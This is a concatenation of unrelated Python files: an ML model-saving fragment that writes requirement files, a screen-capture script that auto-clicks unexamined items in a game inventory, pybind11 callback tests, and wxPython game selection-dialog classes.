default_reqs = sorted(set(inferred_reqs).union(default_reqs))
else:
default_reqs = None
conda_env, pip_requirements, pip_constraints = _process_pip_requirements(
default_reqs,
pip_requirements,
extra_pip_requirements,
)
else:
conda_env, pip_requirements, pip_constraints = _process_conda_env(conda_env)
with open(os.path.join(path, _CONDA_ENV_FILE_NAME), "w") as f:
yaml.safe_dump(conda_env, stream=f, default_flow_style=False)
# Save `constraints.txt` if necessary
if pip_constraints:
write_to(os.path.join(path, _CONSTRAINTS_FILE_NAME), "\n".join(pip_constraints))
# Save `requirements.txt`
write_to(os.path.join(path, _REQUIREMENTS_FILE_NAME), "\n".join(pip_requirements))
return mlflow_model
loader_template = """
import importlib
import os
import sys
def load_pyfunc():
{update_path}return importlib.import_module('{main}')._load_pyfunc('{data_path}')
"""
|
tarkov_examine.py
|
import argparse
import logging
import threading
from collections import namedtuple
from time import sleep
from typing import List
import numpy as np
import cv2 as cv
from mss import mss
import pyautogui
parser = argparse.ArgumentParser()
parser.add_argument('--debug', action='store_true')
parser.add_argument('--no-wheel-click', action='store_true')
args = parser.parse_args()
logging.getLogger().setLevel(logging.INFO)
Point = namedtuple('Point', ['x', 'y'])
mon = {'left': 0, 'top': 0, 'width': 1920, 'height': 1080}
inv_p1 = Point(9, 262)
inv_p2 = Point(638, 954)
r_side = 62
scrollbar_x_pos = (640, 648)
PAGE_SIZE_Y = 11
PAGE_SIZE_X = 10
GREY_RANGE = ([64, 64, 64, 0], [86, 86, 86, 255])
DARK_GREY_RANGE = ([41, 41, 41, 0], [66, 66, 66, 255])
OBJECT_RANGE = ([14, 14, 14, 0], [30, 30, 30, 255])
GREY_THRESHOLD = 300
DARK_GREY_THRESHOLD = 300
OBJECT_THRESHOLD = 100
class Inventory:
pass
# todo If I ever come back to this, the code should be heavily refactored:
# todo - init_inventory_matrix
# todo - move other matrix requiring funcs to this class
# todo - reset_clicked_cells
# todo Because now it's just a kludge
def get_img_mask(img, lower_bound, upper_bound):
lower_grey = np.array(lower_bound)
upper_grey = np.array(upper_bound)
return cv.inRange(img, lower_grey, upper_grey)
def init_inventory_matrix(upper_left_corner: Point, r_side: int):
x1, y1 = upper_left_corner
inv_matrix = np.ndarray(shape=(PAGE_SIZE_Y, PAGE_SIZE_X, 2, 2), dtype=int)
for i in range(len(inv_matrix)):
for j in range(len(inv_matrix[i])):
inv_matrix[i][j] = [
[x1 + r_side * j + j, y1 + r_side * i + i],
[x1 + r_side * (j + 1) + j, y1 + r_side * (i + 1) + i]
]
return inv_matrix
def draw_rectangles(image, inv_matrix, inv_mask, color, thickness):
for i in range(len(inv_mask)):
for j in range(len(inv_mask[i])):
if inv_mask[i][j]:
box = inv_matrix[i][j]
cv.rectangle(image, *box, color, thickness)
def get_inv_mask(img_mask, inv_matrix, threshold):
inv_mask = np.zeros(shape=(len(inv_matrix), len(inv_matrix[0])), dtype=bool)
for i in range(len(inv_matrix)):
for j in range(len(inv_matrix[i])):
(x1, y1), (x2, y2) = inv_matrix[i][j]
nonzeros = np.count_nonzero(img_mask[y1:y2, x1:x2])
if nonzeros > threshold:
inv_mask[i][j] = True
return inv_mask
def get_box_center(box_x1, box_y1):
return Point(box_x1 + r_side / 2, box_y1 + r_side / 2)
def delete_clicked_items_from_mask(inv_mask, clicked_indexes):
for i, j in clicked_indexes:
inv_mask[i][j] = False
def mouse_clicker(coords_queue: List[Point]):
logging.info('mouse_clicker started')
try:
while True:
with new_mouse_coords_added:
logging.info('mouse_clicker waiting for coords')
new_mouse_coords_added.wait()
if stop_event.is_set():
logging.info('mouse_clicker stopping')
return
while len(coords_queue):
coords = coords_queue.pop(0)
if args.debug or args.no_wheel_click:
pyautogui.click(coords.x, coords.y)
else:
pyautogui.middleClick(coords.x, coords.y)
logging.info(f'Mouse click: {pyautogui.position()}')
pyautogui.moveTo(mon['width'], mon['height'] / 2)
except pyautogui.FailSafeException as error:
logging.info(error)
def get_item_inv_mask(img, inv_matrix):
img_mask_hatching_grey = get_img_mask(img, *GREY_RANGE)
img_mask_hatching_dark_grey = get_img_mask(img, *DARK_GREY_RANGE)
img_mask_object = get_img_mask(img, *OBJECT_RANGE)
inventory_mask_grey = get_inv_mask(
img_mask_hatching_grey, inv_matrix, GREY_THRESHOLD
)
inventory_mask_dark_grey = get_inv_mask(
img_mask_hatching_dark_grey, inv_matrix, DARK_GREY_THRESHOLD
)
inventory_mask_object = get_inv_mask(
img_mask_object, inv_matrix, OBJECT_THRESHOLD
)
inventory_mask_background = np.bitwise_and(
inventory_mask_grey, inventory_mask_dark_grey
)
inventory_mask_full_item = np.bitwise_and(
inventory_mask_background, inventory_mask_object
)
if args.debug:
cv.imshow('mask_hatching', get_inventory_area(img_mask_hatching_grey))
cv.imshow('img_mask_hatching_dark_grey', get_inventory_area(img_mask_hatching_dark_grey))
cv.imshow('img_mask_object', get_inventory_area(img_mask_object))
return inventory_mask_full_item
def take_screenshots_until_found(inv_matrix):
with mss() as sct:
logging.info('Taking screenshots...')
while True:
screenshot = sct.grab(mon)
img = np.array(screenshot)
inv_mask_full_item = get_item_inv_mask(img, inv_matrix)
if np.count_nonzero(inv_mask_full_item) > 0:
logging.info('Not examined items found')
return img, inv_mask_full_item
def take_screenshot():
with mss() as sct:
screenshot = sct.grab(mon)
img = np.array(screenshot)
return img
def get_inventory_area(screen_img):
return screen_img[inv_p1.y:inv_p2.y, inv_p1.x:inv_p2.x]
def scroll_down(items: int):
pyautogui.click(inv_p2.x - r_side / 2, inv_p2.y)
for _ in range(items):
pyautogui.scroll(-1)
pyautogui.moveTo(mon['width'], mon['height'] / 2)
def is_scrollbar_at_bottom(img):
""" Checking an area here to prevent an edge case when mouse gets in the way """
# if area is bright, then it's at the bottom
return np.min(img[inv_p2.y:(inv_p2.y + int(r_side * 0.75)), scrollbar_x_pos[0]:scrollbar_x_pos[1]]) != 0
def main_loop():
inventory_matrix = init_inventory_matrix(inv_p1, r_side)
clicked_cells: List[tuple] = []
while True:
scr_img = take_screenshot()
# Get inventory mask with unexamined items
inventory_mask_full_item = get_item_inv_mask(scr_img, inventory_matrix)
# Remove clicked item from the mask
delete_clicked_items_from_mask(inventory_mask_full_item, clicked_cells)
if np.count_nonzero(inventory_mask_full_item) > 0:
logging.info('Not examined items found')
if args.debug:
draw_rectangles(scr_img, inventory_matrix, inventory_mask_full_item, (0, 0, 255), 2)
cv.imshow('Tarkov examine', get_inventory_area(scr_img))
cv.waitKey(0)
item_indexes = np.where(inventory_mask_full_item)
if len(item_indexes[0]) == 0:
if is_scrollbar_at_bottom(scr_img):
logging.info('Reached the bottom, ending execution')
break
logging.info('No new items found, scrolling down')
scroll_down(PAGE_SIZE_Y)
clicked_cells = []
continue
index_x, index_y = item_indexes[0][0], item_indexes[1][0]
(x1, y1), _ = inventory_matrix[index_x][index_y]
# One click per screenshot to skip large already examined items
mouse_coords_queue.append(get_box_center(x1, y1))
clicked_cells.append((index_x, index_y))
with new_mouse_coords_added:
new_mouse_coords_added.notify()
sleep(1.1)
stop_event = threading.Event()
new_mouse_coords_added = threading.Condition()
mouse_coords_queue = []
mouse_click_thread = threading.Thread(target=mouse_clicker, args=[mouse_coords_queue])
mouse_click_thread.start()
try:
main_loop()
except KeyboardInterrupt:
logging.info('KeyboardInterrupt, stopping execution')
except Exception as e:
logging.error(e)
raise e
finally:
logging.info('Cleaning up...')
stop_event.set()
with new_mouse_coords_added:
new_mouse_coords_added.notify()
cv.destroyAllWindows()
mouse_click_thread.join()
|
test_callbacks.py
|
# -*- coding: utf-8 -*-
import pytest
from pybind11_tests import callbacks as m
from threading import Thread
import time
import env # NOQA: F401
def test_callbacks():
from functools import partial
def func1():
return "func1"
def func2(a, b, c, d):
return "func2", a, b, c, d
def func3(a):
return "func3({})".format(a)
assert m.test_callback1(func1) == "func1"
assert m.test_callback2(func2) == ("func2", "Hello", "x", True, 5)
assert m.test_callback1(partial(func2, 1, 2, 3, 4)) == ("func2", 1, 2, 3, 4)
assert m.test_callback1(partial(func3, "partial")) == "func3(partial)"
assert m.test_callback3(lambda i: i + 1) == "func(43) = 44"
f = m.test_callback4()
assert f(43) == 44
f = m.test_callback5()
assert f(number=43) == 44
def test_bound_method_callback():
# Bound Python method:
class MyClass:
def double(self, val):
return 2 * val
z = MyClass()
assert m.test_callback3(z.double) == "func(43) = 86"
z = m.CppBoundMethodTest()
assert m.test_callback3(z.triple) == "func(43) = 129"
def test_keyword_args_and_generalized_unpacking():
def f(*args, **kwargs):
return args, kwargs
assert m.test_tuple_unpacking(f) == (("positional", 1, 2, 3, 4, 5, 6), {})
assert m.test_dict_unpacking(f) == (
("positional", 1),
{
"key": "value",
"a": 1,
"b": 2
},
)
assert m.test_keyword_args(f) == ((), {"x": 10, "y": 20})
assert m.test_unpacking_and_keywords1(f) == ((1, 2), {"c": 3, "d": 4})
assert m.test_unpacking_and_keywords2(f) == (
("positional", 1, 2, 3, 4, 5),
{
"key": "value",
"a": 1,
"b": 2,
"c": 3,
"d": 4,
"e": 5
},
)
with pytest.raises(TypeError) as excinfo:
m.test_unpacking_error1(f)
assert "Got multiple values for keyword argument" in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
m.test_unpacking_error2(f)
assert "Got multiple values for keyword argument" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
m.test_arg_conversion_error1(f)
assert "Unable to convert call argument" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
m.test_arg_conversion_error2(f)
assert "Unable to convert call argument" in str(excinfo.value)
def test_lambda_closure_cleanup():
m.test_cleanup()
cstats = m.payload_cstats()
assert cstats.alive() == 0
assert cstats.copy_constructions == 1
assert cstats.move_constructions >= 1
def test_cpp_function_roundtrip():
"""Test if passing a function pointer from C++ -> Python -> C++ yields the original pointer"""
assert (m.test_dummy_function(m.dummy_function) == "matches dummy_function: eval(1) = 2")
assert (m.test_dummy_function(m.roundtrip(m.dummy_function)) == "matches dummy_function: eval(1) = 2")
assert (m.test_dummy_function(m.dummy_function_overloaded) == "matches dummy_function: eval(1) = 2")
assert m.roundtrip(None, expect_none=True) is None
assert (m.test_dummy_function(lambda x: x + 2) == "can't convert to function pointer: eval(1) = 3")
with pytest.raises(TypeError) as excinfo:
m.test_dummy_function(m.dummy_function2)
assert "incompatible function arguments" in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
m.test_dummy_function(lambda x, y: x + y)
assert any(
s in str(excinfo.value) for s in ("missing 1 required positional argument", "takes exactly 2 arguments"))
def test_function_signatures(doc):
assert doc(m.test_callback3) == "test_callback3(arg0: Callable[[int], int]) -> str"
assert doc(m.test_callback4) == "test_callback4() -> Callable[[int], int]"
def test_movable_object():
assert m.callback_with_movable(lambda _: None) is True
@pytest.mark.skipif(
"env.PYPY",
reason="PyPy segfaults on here. See discussion on #1413.",
)
def test_python_builtins():
"""Test if python builtins like sum() can be used as callbacks"""
assert m.test_sum_builtin(sum, [1, 2, 3]) == 6
assert m.test_sum_builtin(sum, []) == 0
def test_async_callbacks():
# serves as state for async callback
class Item:
def __init__(self, value):
self.value = value
res = []
# generate stateful lambda that will store result in `res`
def gen_f():
s = Item(3)
return lambda j: res.append(s.value + j)
# do some work async
work = [1, 2, 3, 4]
m.test_async_callback(gen_f(), work)
# wait until work is done
from time import sleep
sleep(0.5)
assert sum(res) == sum(x + 3 for x in work)
def test_async_async_callbacks():
t = Thread(target=test_async_callbacks)
t.start()
t.join()
def test_callback_num_times():
# Super-simple micro-benchmarking related to PR #2919.
# Example runtimes (Intel Xeon 2.2GHz, fully optimized):
# num_millions 1, repeats 2: 0.1 secs
# num_millions 20, repeats 10: 11.5 secs
one_million = 1000000
num_millions = 1 # Try 20 for actual micro-benchmarking.
repeats = 2 # Try 10.
rates = []
for rep in range(repeats):
t0 = time.time()
m.callback_num_times(lambda: None, num_millions * one_million)
td = time.time() - t0
rate = num_millions / td if td else 0
rates.append(rate)
if not rep:
print()
print("callback_num_times: {:d} million / {:.3f} seconds = {:.3f} million / second".format(
num_millions, td, rate))
if len(rates) > 1:
print("Min Mean Max")
print("{:6.3f} {:6.3f} {:6.3f}".format(min(rates), sum(rates) / len(rates), max(rates)))
|
select.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import time
import threading
import shutil
import itertools
import wx
import cw
import cw.binary.cwfile
import cw.binary.environment
import cw.binary.party
import cw.binary.adventurer
import message
import charainfo
#-------------------------------------------------------------------------------
# 選択ダイアログ スーパークラス
#-------------------------------------------------------------------------------
class Select(wx.Dialog):
def __init__(self, parent, name):
wx.Dialog.__init__(self, parent, -1, name,
style=wx.CAPTION|wx.SYSTEM_MENU|wx.CLOSE_BOX)
self.cwpy_debug = False
self._processing = False
self.list = []
self.toppanel = None
self.additionals = []
self.addctrlbtn = None
self._paperslide = False
self._paperslide2 = False
# panel
self.panel = wx.Panel(self, -1, size=(-1,cw.wins(30)))
# buttonlist
self.buttonlist = []
# leftjump
bmp = cw.cwpy.rsrc.buttons["LJUMP"]
self.left2btn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((30, 30)), bmp=bmp, chain=True)
# left
bmp = cw.cwpy.rsrc.buttons["LMOVE"]
self.leftbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_UP, cw.wins((30, 30)), bmp=bmp, chain=True)
# right
bmp = cw.cwpy.rsrc.buttons["RMOVE"]
self.rightbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_DOWN, cw.wins((30, 30)), bmp=bmp, chain=True)
# rightjump
bmp = cw.cwpy.rsrc.buttons["RJUMP"]
self.right2btn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((30, 30)), bmp=bmp, chain=True)
# focus
self.panel.SetFocusIgnoringChildren()
# ダブルクリックとマウスアップを競合させないため
# toppanelの上でマウスダウンしてからアップで
# 初めてOnSelectBase()が呼ばれるようにする
self._downbutton = -1
self.previd = wx.NewId()
self.nextid = wx.NewId()
self.leftkeyid = wx.NewId()
self.rightkeyid = wx.NewId()
self.left2keyid = wx.NewId()
self.right2keyid = wx.NewId()
self.backid = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnPrevButton, id=self.previd)
self.Bind(wx.EVT_MENU, self.OnNextButton, id=self.nextid)
self.Bind(wx.EVT_MENU, self.OnCancel, id=self.backid)
self.Bind(wx.EVT_MENU, self.OnClickLeftBtn, id=self.leftkeyid)
self.Bind(wx.EVT_MENU, self.OnClickRightBtn, id=self.rightkeyid)
self.Bind(wx.EVT_MENU, self.OnClickLeft2Btn, id=self.left2keyid)
self.Bind(wx.EVT_MENU, self.OnClickRight2Btn, id=self.right2keyid)
seq = [
(wx.ACCEL_NORMAL, wx.WXK_LEFT, self.previd),
(wx.ACCEL_NORMAL, wx.WXK_RIGHT, self.nextid),
(wx.ACCEL_NORMAL, wx.WXK_BACK, self.backid),
(wx.ACCEL_NORMAL, ord('_'), self.backid),
(wx.ACCEL_CTRL, wx.WXK_LEFT, self.leftkeyid),
(wx.ACCEL_CTRL, wx.WXK_RIGHT, self.rightkeyid),
(wx.ACCEL_CTRL|wx.ACCEL_ALT, wx.WXK_LEFT, self.left2keyid),
(wx.ACCEL_CTRL|wx.ACCEL_ALT, wx.WXK_RIGHT, self.right2keyid),
]
self.accels = seq
cw.util.set_acceleratortable(self, seq, ignoreleftrightkeys=(wx.TextCtrl, wx.Dialog))
def _bind(self):
self.Bind(wx.EVT_BUTTON, self.OnClickLeftBtn, self.leftbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickLeft2Btn, self.left2btn)
self.Bind(wx.EVT_BUTTON, self.OnClickRightBtn, self.rightbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickRight2Btn, self.right2btn)
self.Bind(wx.EVT_MOUSEWHEEL, self.OnMouseWheel)
def empty(event):
pass
self.toppanel.Bind(wx.EVT_ERASE_BACKGROUND, empty)
self.toppanel.Bind(wx.EVT_MIDDLE_DOWN, self.OnMouseDown)
self.toppanel.Bind(wx.EVT_LEFT_DOWN, self.OnMouseDown)
self.toppanel.Bind(wx.EVT_MIDDLE_UP, self.OnSelectBase)
self.toppanel.Bind(wx.EVT_LEFT_UP, self.OnSelectBase)
def recurse(ctrl):
if not isinstance(ctrl, (wx.TextCtrl, wx.SpinCtrl)):
ctrl.Bind(wx.EVT_RIGHT_UP, self.OnCancel)
ctrl.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
for child in ctrl.GetChildren():
recurse(child)
recurse(self)
self.toppanel.Bind(wx.EVT_PAINT, self.OnPaint2)
self.toppanel.Bind(wx.EVT_MOTION, self.OnMotion)
buttonlist = filter(lambda button: button.IsEnabled(), self.buttonlist)
if buttonlist:
buttonlist[0].SetFocus()
def is_processing(self):
return self._processing
def OnPrevButton(self, event):
focus = wx.Window.FindFocus()
buttonlist = filter(lambda button: button.IsEnabled(), self.buttonlist)
if buttonlist:
if focus in buttonlist:
index = buttonlist.index(focus)
buttonlist[index-1].SetFocus()
else:
buttonlist[-1].SetFocus()
def OnNextButton(self, event):
focus = wx.Window.FindFocus()
buttonlist = filter(lambda button: button.IsEnabled(), self.buttonlist)
if buttonlist:
if focus in buttonlist:
index = buttonlist.index(focus)
buttonlist[(index+1) % len(buttonlist)].SetFocus()
else:
buttonlist[0].SetFocus()
def OnMotion(self, evt):
if not self._paperslide:
self._update_mousepos()
self._paperslide2 = False
self._paperslide3 = False
self._paperslide_d = False
#貼り紙バグ再現
self._paperslide = False
def _update_mousepos(self):
if not self.can_clickside():
if self.can_clickcenter():
self.toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_FINGER"])
else:
self.toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_ARROW"])
self.clickmode = 0
return
rect = self.toppanel.GetClientRect()
x, _y = self.toppanel.ScreenToClient(wx.GetMousePosition())
if x < rect.x + rect.width / 4 and self.leftbtn.IsEnabled():
self.toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_BACK"])
self.clickmode = wx.LEFT
elif rect.x + rect.width / 4 * 3 < x and self.rightbtn.IsEnabled():
self.toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_FORE"])
self.clickmode = wx.RIGHT
else:
if self.can_clickcenter():
self.toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_FINGER"])
else:
self.toppanel.SetCursor(cw.cwpy.rsrc.cursors["CURSOR_ARROW"])
self.clickmode = 0
def OnClickLeftBtn(self, evt):
if len(self.list) <= 1:
return
if not (self._paperslide or self._paperslide2) and not self.can_clickcenter():
self._paperslide_d = True
self._paperslide3 = True
if self.index == 0:
self.index = len(self.list) -1
else:
self.index -= 1
cw.cwpy.play_sound("page")
self.draw(True)
self.index_changed()
def OnClickLeft2Btn(self, evt):
if len(self.list) <= 1:
return
if self.index == 0:
self.index = len(self.list) -1
elif self.index - 10 < 0:
self.index = 0
else:
self.index -= 10
cw.cwpy.play_sound("page")
self.draw(True)
self.index_changed()
def OnClickRightBtn(self, evt):
if len(self.list) <= 1:
return
if not (self._paperslide or self._paperslide2) and not self.can_clickcenter():
self._paperslide_d = True
self._paperslide3 = True
if self.index == len(self.list) -1:
self.index = 0
else:
self.index += 1
cw.cwpy.play_sound("page")
self.draw(True)
self.index_changed()
def OnClickRight2Btn(self, evt):
if len(self.list) <= 1:
return
if self.index == len(self.list) -1:
self.index = 0
elif self.index + 10 > len(self.list) -1:
self.index = len(self.list) -1
else:
self.index += 10
cw.cwpy.play_sound("page")
self.draw(True)
self.index_changed()
def OnKeyDown(self, event):
pass
def index_changed(self):
pass
def OnMouseWheel(self, event):
if cw.util.has_modalchild(self):
return
if not self.list or len(self.list) == 1:
return
if cw.util.get_wheelrotation(event) > 0:
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, wx.ID_UP)
self.ProcessEvent(btnevent)
else:
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, wx.ID_DOWN)
self.ProcessEvent(btnevent)
def OnMouseDown(self, event):
if cw.util.has_modalchild(self):
return
self._downbutton = event.GetButton()
def OnSelectBase(self, event):
if self._processing:
return
if self._downbutton <> event.GetButton():
self._downbutton = -1
return
self._downbutton = -1
self._update_mousepos()
if self.clickmode == wx.LEFT and self.leftbtn.IsEnabled():
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self.leftbtn.GetId())
self.ProcessEvent(btnevent)
elif self.clickmode == wx.RIGHT and self.rightbtn.IsEnabled():
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self.rightbtn.GetId())
self.ProcessEvent(btnevent)
else:
self.OnSelect(event)
def OnSelect(self, event):
if not self.list:
return
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, wx.ID_OK)
self.ProcessEvent(btnevent)
def OnCancel(self, event):
cw.cwpy.play_sound("click")
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, wx.ID_CANCEL)
self.ProcessEvent(btnevent)
def OnPaint2(self, event):
self.draw()
def draw(self, update=False):
if not self.toppanel.IsShown():
return None
if update:
dc = wx.ClientDC(self.toppanel)
dc = wx.BufferedDC(dc, self.toppanel.GetSize())
else:
dc = wx.BufferedPaintDC(self.toppanel)
return dc
def _do_layout(self):
sizer_1 = wx.BoxSizer(wx.VERTICAL)
self.set_panelsizer()
self.topsizer = wx.BoxSizer(wx.VERTICAL)
self.topsizer.Add(self.toppanel, 1, wx.EXPAND, 0)
self._add_topsizer()
sizer_1.Add(self.topsizer, 1, wx.EXPAND, 0)
sizer_1.Add(self.panel, 0, wx.EXPAND, 0)
self.SetSizer(sizer_1)
sizer_1.Fit(self)
self.Layout()
def _add_topsizer(self):
pass
def set_panelsizer(self):
sizer_panel = wx.BoxSizer(wx.HORIZONTAL)
sizer_panel.Add(self.left2btn, 0, 0, 0)
sizer_panel.Add(self.leftbtn, 0, 0, 0)
# sizer_panelにbuttonを設定
for button in self.buttonlist:
sizer_panel.AddStretchSpacer(1)
sizer_panel.Add(button, 0, wx.TOP|wx.BOTTOM, cw.wins(3))
sizer_panel.AddStretchSpacer(1)
sizer_panel.Add(self.rightbtn, 0, 0, 0)
sizer_panel.Add(self.right2btn, 0, 0, 0)
self.panel.SetSizer(sizer_panel)
def _disable_btn(self, enables=[][:]):
lrbtns = (self.rightbtn, self.right2btn, self.leftbtn, self.left2btn)
for btn in itertools.chain(self.buttonlist, lrbtns):
if btn in enables:
btn.Enable()
else:
btn.Disable()
def _enable_btn(self, disables=[][:]):
lrbtns = (self.rightbtn, self.right2btn, self.leftbtn, self.left2btn)
for btn in itertools.chain(self.buttonlist, lrbtns):
if btn in disables:
btn.Disable()
else:
btn.Enable()
def can_clickcenter(self):
"""パネルの中央部分をクリックで決定可能ならTrue。"""
return True
def can_clickside(self):
"""パネルの左右クリックでページ切替可能ならTrue。"""
return True
def _init_narrowpanel(self, choices, narrowtext, narrowtype, tworows=False):
font = cw.cwpy.rsrc.get_wxfont("paneltitle2", pixelsize=cw.wins(13))
if tworows:
self.narrow = wx.TextCtrl(self, -1, size=(cw.wins(0), -1), style=wx.TE_PROCESS_ENTER | wx.SIMPLE_BORDER)
else:
self.narrow = wx.TextCtrl(self, -1, size=(cw.wins(0), -1), style=wx.SIMPLE_BORDER)
self.narrow_label = wx.StaticText(self, -1, label=cw.cwpy.msgs["narrow_condition"])
self.narrow_label.SetFont(font)
self.narrow.SetFont(font)
self.narrow.SetValue(narrowtext)
# self.narrow_label = wx.StaticText(self, -1, label=cw.cwpy.msgs["narrow_condition2"])
# self.narrow_label.SetFont(font)
cfont = cw.cwpy.rsrc.get_wxfont("combo", pixelsize=cw.wins(13))
self.narrow_type = wx.Choice(self, -1, size=(-1, -1), choices=choices)
self.narrow_type.SetFont(cfont)
self.narrow_type.SetSelection(narrowtype)
self.narrow.Bind(wx.EVT_TEXT, self.OnNarrowCondition)
self.narrow.Bind(wx.EVT_TEXT_ENTER, self.OnFind)
self.narrow_type.Bind(wx.EVT_CHOICE, self.OnNarrowCondition)
def OnFind(self, event):
pass
def OnNarrowCondition(self, event):
if self._processing:
return
cw.cwpy.play_sound("page")
# 日本語入力で一度に何度もイベントが発生する
# 事があるので絞り込み実施を遅延する
self._reserved_narrowconditin = True
if wx.Window.FindFocus() <> self.narrow:
self.toppanel.SetFocus()
def func():
if not self._reserved_narrowconditin:
return
self._on_narrowcondition()
self._reserved_narrowconditin = False
wx.CallAfter(func)
def _on_narrowcondition(self):
pass
def create_addctrlbtn(self, parent, bg, show):
"""追加的なコントロールの表示切替を行うボタンを生成する。
parent: ボタンの親コントロール。
bg: ボタンの背景色の基準となるwx.Bitmap。
show: 表示の初期状態。
"""
if self.addctrlbtn:
self.addctrlbtn.Destroy()
self.addctrlbtn = wx.lib.buttons.ThemedGenBitmapToggleButton(parent, -1, None, size=cw.wins((24, 24)))
if not cw.cwpy.setting.show_addctrlbtn:
self.addctrlbtn.Hide()
self.addctrlbtn.SetToggle(show)
img = cw.util.convert_to_image(bg)
x, y = img.GetWidth()-12, 0
r, g, b = img.GetRed(x, y), img.GetGreen(x, y), img.GetBlue(x, y)
colour = wx.Colour(r, g, b)
self.addctrlbtn.SetBackgroundColour(colour)
self.Bind(wx.EVT_BUTTON, self.OnAdditionalControls, self.addctrlbtn)
self.addctrlbtn.SetCursor(wx.StockCursor(wx.CURSOR_ARROW))
def update_additionals(self):
"""表示状態の切り替え時に呼び出される。"""
show = self.addctrlbtn.GetToggle()
for ctrl in self.additionals:
if isinstance(ctrl, tuple):
ctrl, forceshow = ctrl
ctrl.Show(show or forceshow())
else:
ctrl.Show(show)
if show:
bmp = cw.cwpy.rsrc.dialogs["HIDE_CONTROLS"]
else:
bmp = cw.cwpy.rsrc.dialogs["SHOW_CONTROLS"]
self.addctrlbtn.SetBitmapFocus(bmp)
self.addctrlbtn.SetBitmapLabel(bmp)
self.addctrlbtn.SetBitmapSelected(bmp)
def append_addctrlaccelerator(self, seq):
"""アクセラレータキーリストseqに追加的コントロール
表示切替のショートカットキー`Ctrl+F`を追加する。
"""
addctrl = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnToggleAdditionalControls, id=addctrl)
seq.append((wx.ACCEL_CTRL, ord('F'), addctrl))
def OnToggleAdditionalControls(self, event):
self.addctrlbtn.SetToggle(not self.addctrlbtn.GetToggle())
self._additional_controls()
def OnAdditionalControls(self, event):
self._additional_controls()
def _additional_controls(self):
cw.cwpy.play_sound("equipment")
self.update_additionals()
self.update_narrowcondition()
# GTKで表示・非表示状態の反映が遅延する事があるので、
# 再レイアウト以降の処理を遅延実行する
def func():
self._do_layout()
self.toppanel.Refresh()
self.panel.Refresh()
self.Refresh()
cw.cwpy.frame.exec_func(func)
#-------------------------------------------------------------------------------
# 一覧表示可能な選択ダイアログ(抽象クラス)
#-------------------------------------------------------------------------------
class MultiViewSelect(Select):
def __init__(self, parent, title, enterid, views=10, show_multi=False, lines=2):
# ダイアログボックス作成
Select.__init__(self, parent, title)
self.viewbtn = None
self._processing = False
self._views = views
self._lines = lines
self._enterid = enterid
self.views = views if show_multi else 1
def can_clickside(self):
return self.views <= 1
def OnLeftDClick(self, event):
# 一覧表示の場合はダブルクリックで決定
if self._processing:
return
if 1 < self.views and self.list and self.can_clickcenter() and self.clickmode == 0:
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self._enterid)
self.ProcessEvent(btnevent)
elif self.can_clickside() and self.clickmode == wx.LEFT:
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self.leftbtn.GetId())
self.ProcessEvent(btnevent)
elif self.can_clickside() and self.clickmode == wx.RIGHT:
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self.rightbtn.GetId())
self.ProcessEvent(btnevent)
def OnMouseWheel(self, event):
if cw.util.has_modalchild(self):
return
if self._processing:
return
if not self.list or len(self.list) == 1:
return
count = self.views
if len(self.list) <= self.views:
count = 1
if cw.util.get_wheelrotation(event) > 0:
self.index = cw.util.number_normalization(self.index - count, 0, len(self.list))
else:
self.index = cw.util.number_normalization(self.index + count, 0, len(self.list))
else:
if cw.util.get_wheelrotation(event) > 0:
self.index = cw.util.number_normalization(self.index - count, 0, self.get_pagecount() * self.views)
else:
self.index = cw.util.number_normalization(self.index + count, 0, self.get_pagecount() * self.views)
if len(self.list) <= self.index:
self.index = len(self.list) - 1
self.index_changed()
cw.cwpy.play_sound("page")
self.draw(True)
def OnClickLeftBtn(self, evt):
if self._processing:
return
if self.views == 1 or evt.GetEventObject() <> self.leftbtn or len(self.list) <= self.views:
Select.OnClickLeftBtn(self, evt)
return
self.index = cw.util.number_normalization(self.index - self.views, 0, self.get_pagecount() * self.views)
if len(self.list) <= self.index:
self.index = len(self.list) - 1
self.index_changed()
cw.cwpy.play_sound("page")
self.draw(True)
def OnClickLeft2Btn(self, evt):
if self._processing:
return
if self.views == 1 or evt.GetEventObject() <> self.left2btn or len(self.list) <= self.views:
Select.OnClickLeft2Btn(self, evt)
return
if self.get_page() == 0:
self.index = len(self.list) - 1
elif self.index - self.views * self._views < 0:
self.index = 0
else:
self.index = self.index - self.views * self._views
self.index_changed()
cw.cwpy.play_sound("page")
self.draw(True)
def OnClickRightBtn(self, evt):
if self._processing:
return
if self.views == 1 or evt.GetEventObject() <> self.rightbtn or len(self.list) <= self.views:
Select.OnClickRightBtn(self, evt)
return
self.index = cw.util.number_normalization(self.index + self.views, 0, self.get_pagecount() * self.views)
if len(self.list) <= self.index:
self.index = len(self.list) - 1
self.index_changed()
cw.cwpy.play_sound("page")
self.draw(True)
